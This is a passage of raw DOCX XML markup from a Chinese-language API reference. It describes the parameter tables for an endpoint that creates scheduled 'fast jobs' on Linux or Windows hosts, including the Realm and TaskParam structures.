          <w:p w14:paraId="6E17313D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC8E66D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51286321" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290933BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611246B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152F42F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="004CAFA1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156FD6B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8BCE6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="547AA65A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18FA5A4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskOutputSchema说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7FA01A7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7671942" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2940E6A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39DD7361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69628C34" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C252DD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="795C5177" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65AE438E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A2A941B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A99D22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79FDC696" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B87343" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数显示名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B495378" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E807D36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayOrder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525083AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D8051E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示顺序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F356F6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4714214C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4E4071" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570B151A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="152F39D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20004812" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45D9991B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47D36DFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FCA7FB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="创建一个快速作业"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建一个快速作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26915E94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E60CDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/fastjob/job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61883D7E"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341"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="4123"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5CBBCB6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2AC085A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC94F04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E942FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D4B95C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B7668E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A290B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F96F542" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F44281E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47BCF078" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3661FFE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A28E90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类型 1：linux; 2：windows (必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="527B34A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C3DFC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596C2603" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24FB29B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="741027E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B9FE433" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20026A32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B0C8B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2222F853" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD7E7EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37E8E6EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF01A04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行范围描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76D4ADDA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329D5F25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A57E3DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78CD4B75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类型 1. 系统内置任务, 2, 用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FA1F877" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="581E8931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26820687" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654127D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="474C7F02" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53C597CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskParams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5D00D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;TaskParam&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F52300" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28F4D568" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB1388E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D38EB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7016778A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2014F009" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53ABBC64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E671859" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="541E0E3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E4953BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Realm结构说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="7759"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="63D205E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E1EB55B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B203E46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F01D194" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C29B47A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B39B21C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F729651" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29FD7978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14752719" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66FD9BE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A523F23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="304CFC3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="317C597F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D699E61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07EDE734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCB6206" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A822466" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskParam 说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="739"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7931234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DBB0691" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
